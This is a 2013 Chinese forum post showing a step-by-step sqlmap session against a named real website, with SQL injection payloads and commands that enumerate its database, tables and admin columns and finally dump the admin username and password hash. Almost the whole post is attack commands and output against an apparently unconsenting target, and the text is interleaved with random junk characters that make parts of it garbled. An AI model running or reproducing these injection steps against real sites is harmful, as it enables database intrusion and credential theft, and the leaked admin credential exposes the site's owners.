找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2362|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" U% {6 j- j7 y" X' {- z. t, v& q
ms "Mysql" --current-user       /*  注解:获取当前用户名称
: i/ Z7 M8 ~+ s2 G" R3 K    sqlmap/0.9 - automatic SQL injection and database takeover tool
" O9 ~* z  O. z& V1 J3 y. V' E    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    6 I8 T/ k5 L4 O6 Y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    - I; B0 B. x8 r3 V% o session file' N/ D6 }8 A7 x& O
    [16:53:54] [INFO] resuming injection data from session file
    ( z& R' E( o5 G; _8 M5 U- m0 `0 s[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ) @1 ]# f! r+ N[16:53:54] [INFO] testing connection to the target url
      h/ ]/ }0 D1 N+ ?! Xsqlmap identified the following injection points with a total of 0 HTTP(s) reque6 S* G+ M) S3 P* v* U5 V
    sts:
    1 ^# ?  O! B0 {4 H% r---9 _& l) _3 u( I* L, J. w! X
    Place: GET/ c: ~: }) U4 G; R5 U
    Parameter: id: ^$ N! d, o; M1 z2 _: X
        Type: boolean-based blind
    . d6 J* y$ \# T. {. C. F9 |  B& W    Title: AND boolean-based blind - WHERE or HAVING clause2 Y& B0 |; D% N7 h# a
        Payload: id=276 AND 799=7992 R! @9 N& r% c: a
        Type: error-based
    2 }3 A$ i( m% D8 u, ?8 J; W" n$ K/ w    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: k- T+ O/ S3 W$ H
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 n9 {# W0 {! u0 v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ' ~; v: H$ c' ^& n  [6 {  ]- [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), O; b; r* U0 m3 M1 [* C9 m
        Type: UNION query9 ~7 h0 P9 L( Z% j8 x0 W
        Title: MySQL UNION query (NULL) - 1 to 10 columns8 X# g& U, d2 c3 V, B0 S# I# @
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( b+ |& H' h3 a* m# n
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ Z. W# Z& `% P+ u1 ?
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ( b+ @5 s( v* q* P$ |  k+ z. V7 |    Type: AND/OR time-based blind7 q* r. q0 V. k+ `/ Z
        Title: MySQL > 5.0.11 AND time-based blind- ~5 `4 d5 k8 M- m
        Payload: id=276 AND SLEEP(5)
    # F9 w( ^- r: |* F  c. y---
    ; M7 f: I1 N; }. y9 ?' d' N7 [[16:53:55] [INFO] the back-end DBMS is MySQL
    ( l6 D, K$ B+ R3 I' Y2 |web server operating system: Windows+ {  C* m7 z6 y5 S* B( p
    web application technology: Apache 2.2.11, PHP 5.3.0$ d9 N! w4 C: v; R8 ?3 a
    back-end DBMS: MySQL 5.0. Y7 x2 n. L% G0 K6 X/ t0 d$ c
    [16:53:55] [INFO] fetching current user
    0 x7 y+ H! z5 Q5 C# Wcurrent user:    'root@localhost'   6 ?2 o+ e; C5 {) x" c
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 o" U' ?2 V# E2 M4 `* V
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    $ Y# h" h0 r6 C/ W! I& G0 X* c
    ; S. B  |, z8 X" S( H$ g3 YD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# x7 e9 c4 z0 }1 t0 e
    ms "Mysql" --current-db                  /*当前数据库$ `$ A5 j; v* p
        sqlmap/0.9 - automatic SQL injection and database takeover tool% z9 v' v* {3 h) E" V6 ^6 J
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    ; }& F3 G. z' g+ n" D[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    5 |! Y& v9 F- d6 b* h) l, u% u session file% k& f* w4 b! [  Z8 c! l1 O4 @, o
    [16:54:16] [INFO] resuming injection data from session file
    " c* k/ S3 O* L7 B[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ( p4 U! {4 s# b' D. k2 t[16:54:16] [INFO] testing connection to the target url$ N- o  Z1 I$ \6 g
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / j6 ~+ W- V; q  x( s* ?& Zsts:  z0 h2 r6 k" l/ Z) e4 {1 X
    ---- o+ d/ {4 o8 b3 x. c, p6 [3 Q
    Place: GET
      x* _4 j0 _6 Z6 z. x" eParameter: id
    8 D8 r6 B# r" S    Type: boolean-based blind
    4 K  ?8 x+ Q" g. N7 O    Title: AND boolean-based blind - WHERE or HAVING clause$ ?  m2 b7 x0 D. G
        Payload: id=276 AND 799=799
    4 C2 g0 p  `- P3 ]5 W    Type: error-based
    ) l# L2 Y' K' g) e" B    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 Y5 v: ]; {; Z
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ j" n7 A& Z7 ~) W% `3 k+ ]  @8 M' C+ g
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) e% V2 @6 l8 a# \" |8 H( q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    2 |) X5 X* N  h% k, I8 P: C    Type: UNION query" |/ J- J1 ]/ _- ]& ?2 i
        Title: MySQL UNION query (NULL) - 1 to 10 columns' I4 K0 D8 W# j' ^4 d# Q( ]
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    & y6 f' u$ q5 J2 n5 T(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ B" t7 Y4 s2 i. {- ?
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    " F- l1 N5 y( L0 Z! C& ?    Type: AND/OR time-based blind
    * `2 H: v! k  b: [  k+ E    Title: MySQL > 5.0.11 AND time-based blind( \* B0 n- @* ?& D7 V* r
        Payload: id=276 AND SLEEP(5)
    / x6 v5 R( X* D6 J% y---
    ( M0 E" D! W- G( {) M6 ~[16:54:17] [INFO] the back-end DBMS is MySQL
    : L6 L- K3 V* @& s; }2 Nweb server operating system: Windows3 T* \6 u* u' V0 r# {; W
    web application technology: Apache 2.2.11, PHP 5.3.05 a4 d' [* U* f1 k! u0 y. Q
    back-end DBMS: MySQL 5.0
    8 t8 M; r% \  I+ I: g  l! G[16:54:17] [INFO] fetching current database
    1 v2 D9 d% P$ _. z, P( q$ C$ Wcurrent database:    'wepost'" i9 e2 |6 m6 V# Z0 r$ e! d
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    - o% H, L# a' K& Q' Y) |tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    4 {7 R* l9 {& m, RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    0 m' X! M! X; e2 Jms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    ; Z3 m' y7 z) {, \: J    sqlmap/0.9 - automatic SQL injection and database takeover tool' f  t% z- n$ h& |
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25# K  e, s) R+ M& B+ y
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as1 L8 A) q5 S  ]7 A) U( m+ _/ [# {
    session file
    . V0 N9 b6 R6 b! o[16:55:25] [INFO] resuming injection data from session file
    ) s5 a- T: W. L. ~0 I$ i[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% T! `8 S5 l. ]  c: ~) `/ K1 m4 n. w
    [16:55:25] [INFO] testing connection to the target url
    : F, {" C' K  A9 k8 Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    # W+ P. h' o1 d: w4 l- Q( d) Nsts:
    3 I. F, _2 l) Y7 c1 p---
    4 U/ ^3 [6 g8 I, j6 s9 g0 S# JPlace: GET
    1 K. m  s+ w& _Parameter: id( A+ P, x, j4 h, K. b* @
        Type: boolean-based blind2 B; ]' w" B' q( |6 U+ i! m, e
        Title: AND boolean-based blind - WHERE or HAVING clause0 C( V  n) Q5 c8 _+ C
        Payload: id=276 AND 799=799
    . f; ~% ]- m3 p7 X" g8 c, `    Type: error-based+ A( G, A2 Y# i% A
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 ~- z8 L, O5 V5 K$ P6 A" g/ D
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 }! k- o, I: ]8 E4 J# }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! d$ V! D, d$ v- M8 m" S
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . }+ s5 S' a1 w6 Z2 a3 J    Type: UNION query9 y8 H# i5 n( S# n
        Title: MySQL UNION query (NULL) - 1 to 10 columns9 |3 y: p* u' E& d
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % F1 E0 N. T8 _& A/ j6 ~5 B(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) s/ |; K) S6 ?, B0 k
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    8 G2 w) I5 u5 Z+ x' a% `6 D8 |    Type: AND/OR time-based blind
    , K' r' b$ E7 ^8 x5 F    Title: MySQL > 5.0.11 AND time-based blind6 a" c! ]8 y! c$ V# p3 m6 T/ i6 P
        Payload: id=276 AND SLEEP(5): o& Z: n$ }1 d; b3 ?$ J% m. H' D
    ---0 v, Q" Q% j4 _1 x5 u
    [16:55:26] [INFO] the back-end DBMS is MySQL
    - C. o. V6 ], S) v4 u4 Rweb server operating system: Windows
      \& {8 x! A7 I. |# ^7 f9 r$ wweb application technology: Apache 2.2.11, PHP 5.3.01 g8 y/ `, s8 a& V% n4 S+ J4 ?
    back-end DBMS: MySQL 5.06 @0 k! j4 s5 L
    [16:55:26] [INFO] fetching tables for database 'wepost'  I& [" E8 {$ P9 [
    [16:55:27] [INFO] the SQL query used returns 6 entries' Z& @* _* ~9 m) T6 {
    Database: wepost- e  x6 C0 g, G# H/ w4 |3 e/ j* I. C
    [6 tables]7 R# f8 @- a, B4 X$ ~* X
    +-------------+
    % P2 g6 y; I6 Q1 c9 U3 T| admin       |/ _  A% Q: U/ K; `
    | article     |( P1 {; v9 w# n5 w3 l& u, j  z
    | contributor |
    # M  m4 M- A/ j( W8 \. h$ l% K| idea        |, X7 K/ h+ Q& D, U& _- u
    | image       |
    0 \) ~+ F3 C1 T$ U. E' r/ b  W| issue       |5 F' f) h+ s" {( S1 K* A6 w
    +-------------+( o' r1 Y" V1 v" B5 k6 \) _# q" v
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    9 O) @/ ]4 m3 ^5 qtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    ' A7 n5 L- J5 I/ A8 {: E: v* J* Q  I5 f7 w  q
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    7 w8 l4 j. {5 W3 y$ pms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    " J3 C/ A' V2 o+ y5 V) r    sqlmap/0.9 - automatic SQL injection and database takeover tool
    & B: G' k5 t0 f, C- A  f  @" O: Q    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    7 D9 W: P1 U9 S- y- e6 G' X/ csqlmap identified the following injection points with a total of 0 HTTP(s) reque5 b3 a/ ^3 h8 Y" S$ q: l$ F
    sts:7 r; N# }; \$ J4 F3 P/ l- G
    ---
    " B/ n& M& f% o% TPlace: GET1 H: `0 h6 J) ]# k/ A1 M- k
    Parameter: id9 r# Q/ y3 n' R" P
        Type: boolean-based blind
    : l$ c) i+ e, x. a: o    Title: AND boolean-based blind - WHERE or HAVING clause; ], j% V6 S- W  }) w( g# ]
        Payload: id=276 AND 799=799. m) b" q) b. l
        Type: error-based/ L" @% m; P, t0 ]) z6 h
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ' {( h- L" ]/ H% y% x) Y. Q( L    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 t- q% g3 D, R8 [- L
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ' v! \6 X; W5 P2 }& m2 F' z! X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" g! R/ P. M6 M+ c
        Type: UNION query* c- ]( N4 g. i6 t
        Title: MySQL UNION query (NULL) - 1 to 10 columns* V  O4 ~3 i( R
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& a* P# v1 j2 m& S
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    4 O! g2 j3 t! ]/ z! LCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; {& Q! S8 F1 D, h
        Type: AND/OR time-based blind' y" g& ?$ H; F: q; k7 T% T+ @
        Title: MySQL > 5.0.11 AND time-based blind' F% _' d& v5 i$ O: X# f3 o
        Payload: id=276 AND SLEEP(5)9 m+ i/ K& }7 O$ L0 I$ s* u0 L
    ---0 l! e9 R: h) Y) m3 X; y
    web server operating system: Windows
    % K0 u: V% G' }4 Uweb application technology: Apache 2.2.11, PHP 5.3.0
    . i) m, w8 I4 z* [% |$ y0 k6 {back-end DBMS: MySQL 5.0
    & e& G. g: |, r& y1 U9 C[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    , Q0 \) ]# e. e5 B* X5 ^" f# Sssion': wepost, wepost, m/ q; V6 B' q& d: U8 I1 }
    Database: wepost
    . }5 d7 f5 k' i/ r9 @0 [0 |$ r0 STable: admin) x$ o  b) E( {
    [4 columns]0 ^! @& z" N, q. S3 a& Z$ N
    +----------+-------------+, N4 f  L" [+ w! ~+ R4 e% L  H2 z
    | Column   | Type        |
    $ z! ]& @* G& G5 t- M7 \" K+----------+-------------+
    " e' q2 S  F3 k6 a  K% v  k| id       | int(11)     |
    0 [' I* F2 k/ n& E/ u/ G7 a| password | varchar(32) |
    5 n2 e  f$ T9 y/ v# U| type     | varchar(10) |6 ?% |& e3 }. T$ t* Q
    | userid   | varchar(20) |
    9 l- r3 C1 d1 A1 k+----------+-------------+: t' a8 D7 G& m* p
  • shutting down at: 16:56:19
    " ~+ I4 a' a( G( U4 e) R. z8 Q4 q& _; q
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    5 I/ A% y6 {' P/ N1 b1 z8 D  o/ cms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    5 L8 ^0 s+ Z8 w4 G7 U9 X( s    sqlmap/0.9 - automatic SQL injection and database takeover tool
    & s0 z+ G9 T( _) l/ E5 L    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    - {5 i. _7 D# x. k7 W1 gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ! J, A, X3 Z' t8 {sts:( d$ [. u5 t- t# R
    ---
    & z1 K6 Z/ K8 ]Place: GET; g& H9 C0 |1 Y) \- r3 [
    Parameter: id2 `5 S# F% @* g, c$ X: q& P
        Type: boolean-based blind
    : G- E5 M! H7 ?$ X    Title: AND boolean-based blind - WHERE or HAVING clause
    9 V3 A5 d2 A. j% I  q    Payload: id=276 AND 799=799
    & U0 t" b* e- X    Type: error-based
    1 Q9 V( y% k  X2 w/ @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    * @4 h6 @' y2 P5 o" a4 A    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ! [( a) |8 \* C2 v( _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 \2 ^" X" V; l0 X8 O; U
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 k8 H3 N/ j1 ?4 I
        Type: UNION query
    3 ]! N" b( I9 ]& n& S    Title: MySQL UNION query (NULL) - 1 to 10 columns
    - Q6 O# T2 w$ Q) G, V    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- U+ x; w/ V  V8 b& H- |& H
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 n' E5 Q/ D7 D( T3 a& M  I( q- YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    - q! S3 E& @9 e+ h1 z    Type: AND/OR time-based blind
    0 l: i( m* |, K    Title: MySQL > 5.0.11 AND time-based blind
    % Q# N4 H" y6 g    Payload: id=276 AND SLEEP(5)
    2 B8 A1 D, U& j4 Y5 o---
      a+ x( @- Q" H# p- U  Sweb server operating system: Windows% }. d7 G1 u# G) |- |
    web application technology: Apache 2.2.11, PHP 5.3.0
    7 d- ^& T  g. T+ r8 oback-end DBMS: MySQL 5.0
    2 ]/ E' y0 |) O! {4 J2 z" brecognized possible password hash values. do you want to use dictionary attack o$ `; z) Z# i3 I1 W) p* U& `
    n retrieved table items? [Y/n/q] y3 x% L1 k2 J, k% B+ u% T* j
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]) o- C( F8 M: N8 p8 ]) @
    do you want to use common password suffixes? (slow!) [y/N] y
    " D+ i2 p9 T. D8 CDatabase: wepost" u1 @$ b8 u6 F1 {: d) Y0 m2 t8 j
    Table: admin
    ! b) W8 [6 @/ C1 K% [0 K8 M+ I3 k[1 entry]0 w! }/ n) L8 f4 ^# b) u
    +----------------------------------+------------+
    , I& G) X+ @2 r& W" G; e% M| password                         | userid     |; z9 S* A# ?( V2 C
    +----------------------------------+------------+
    ! f4 O" _; o* t  u| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    ; [* B) ?, ?1 k% c: _5 ]5 K+----------------------------------+------------+
    0 D6 ^+ u. j8 T( I+ {- \" ?
  • shutting down at: 16:58:148 q3 k- s  z% B
    4 x( D! _  `! `! L% X  A
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表